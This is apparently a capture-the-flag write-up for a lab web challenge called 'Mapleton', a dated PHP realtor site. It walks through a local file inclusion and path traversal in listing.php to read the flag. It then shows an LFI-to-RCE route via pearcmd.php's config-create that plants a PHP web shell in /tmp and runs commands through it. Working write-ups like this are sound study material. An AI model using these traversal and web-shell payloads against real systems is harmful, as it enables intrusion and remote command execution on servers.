Mapleton
Maggie has shown Mapleton homes for thirty years. Her son Eli rebuilt the office website one weekend after PHP 5 came out — they've been swapping photos and prices on it ever since, but nobody's looked at the templating since the original Bush administration.
Room Description
https://dashboard.webverselabs-pro.com/mystery-challenges/mapleton
Briefing
Maggie has shown Mapleton homes for thirty years. Her son Eli rebuilt the office website one weekend after PHP 5 came out — they've been swapping photos and prices on it ever since, but nobody's looked at the templating since the original Bush administration. The office laptop password is on a sticky note by the coffee pot. The flag is in the realtor's home directory; the route in lives in plain sight.
Initial Analysis
This is going to be a quick and easy challenge, we won't be going into too many details.
We have a realtor service where we can browse houses.
This challenge is a all roads lead to Rome kind of situation, where yes, there are several endpoints to look at, but also, they kind of all lead you to the same place.
<ul class="nav__menu">
<li><a href="/" class="nav__link ">Home</a></li>
<li><a href="/listings.php" class="nav__link nav__link--active">Buy</a></li>
<li><a href="/contact.php" class="nav__link ">Sell</a></li>
<li><a href="/listings.php?town=Mapleton" class="nav__link">Areas</a></li>
<li><a href="/about.php" class="nav__link ">About</a></li>
</ul>
<div class="nav__cta">
<a href="/contact.php" class="btn btn--primary btn--sm">List your home</a>
</div>
The only place of interest is /listing.php, /contact.php is a form we can fill in to get in contact with the owners, but we don't really see our response anywhere, and /about.php is just static text.
Finding the bug
We have several listings available to us that we can browse through.
If we open any one of them, we can see that the URL is showing us the following information:
https://b2c492f8-3970-mapleton-b1502.mystery-challenges.webverselabs-pro.com/listing.php?listing=12-elm-street.html
We can see that 12-elm-street.html is specifically being called to render this page for us, this looks like a typical Local File Inclusion vulnerability through Path Traversal.
If we change 12-elm-street to anything else, we can see that the system is trying to read the file path we supply to it.
Exploitation
Intended path
Knowing that we have LFI, we need to try Path Traversal now, the most logical file to attack is /etc/passwd.
We just need to add ../ until we find how many directories deep we are. Turns out it's 4!
We see a user account, and we know based on the description the flag is there, so we can just try to read:
../../../../home/realtor/flag.txt
Unintended path
https://labs.watchtowr.com/form-tools-we-need-to-talk-about-php/
This is funny, because I thought I had found this unintended route and was happy to share it through the writeup, but someone had beaten me to it already (@7s26simon's writeup), I had seen this in a CTF and usually with these LFI challenges I try to find the source code to see what the mistake is, so I started looking around for files and managed to find /usr/local/lib/php/pearcmd.php.
Since we are getting a 200 response, with no errors, it definitely exists. The CTF solution I am referring to is the following, whilst actual research related to pearcmd.php is at the top of this paragraph.
https://medium.com/@sudo_von/php-lfi-sourceless-guessy-web-rce-flag-seetf-bcd4e7f195af
We can quite literally re-create the payload from either the reserch or the CTF in this environment:
/?+config-create+/&page=../../../../../usr/local/lib/php/pearcmd.ph&/<?=system($_GET[‘cmd’])?>+../../../../../tmp/sudo_von.php
That is the payload for the random CTF, we can adapt it to our environment.
/listing.php?listing=../../../../usr/local/lib/php/pearcmd.php&+config-create+/<?=system($_GET['cmd'])?>+/rce.php
First I tried like that, unfortunately it seemed as though it didn't work, and then I thought that maybe we don't have write permissions there, so I had to try /tmp.
/listing.php?listing=../../../../usr/local/lib/php/pearcmd.php&+config-create+/<?=system($_GET['cmd'])?>+/tmp/lfi2rce.php
Well, that definitely worked.
Now, we already know where the flag is from the original vulnerability, just wanted to show another way about it.
/listing.php?listing=../../../../tmp/lfi2rce.php&cmd=cat+/home/realtor/flag.txt
